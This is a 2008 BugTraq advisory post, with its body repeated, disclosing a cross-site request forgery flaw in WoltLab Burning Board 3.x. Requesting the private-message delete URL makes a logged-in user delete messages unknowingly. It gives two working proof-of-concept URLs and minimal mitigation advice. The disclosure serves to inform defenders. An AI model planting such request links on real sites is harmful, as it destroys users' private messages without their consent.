BugTraq
Back to list
|
Post reply
WoltLab Burning Board 3.x.x Private Message Delete XSRF Vulnerability
Jan 26 2008 11:23PM
nbbn gmx net
########################################################################
#####
WoltLab Burning Board 3.x.x PM Delete Cross-Site Request Forgery Vulnerability
by NBBN. Founded: 25 December 2007
########################################################################
#####
Examples:
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=[pmi
d]
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=1
Fix:
Wait for a fix. Or never surf in other sites, if you have autologin on and
don't click links, when you are logged in.
Vulnerability Versions:
I tested it only on 3.0.1 but I think that all version of 3 are vuln.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#####
WoltLab Burning Board 3.x.x PM Delete Cross-Site Request Forgery Vulnerability
by NBBN. Founded: 25 December 2007
########################################################################
#####
Examples:
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=[pmi
d]
http://domain.tld/wbb3/index.php?page=PM&action=delete&pmID=1
Fix:
Wait for a fix. Or never surf in other sites, if you have autologin on and
don't click links, when you are logged in.
Vulnerability Versions:
I tested it only on 3.0.1 but I think that all version of 3 are vuln.
[ reply ]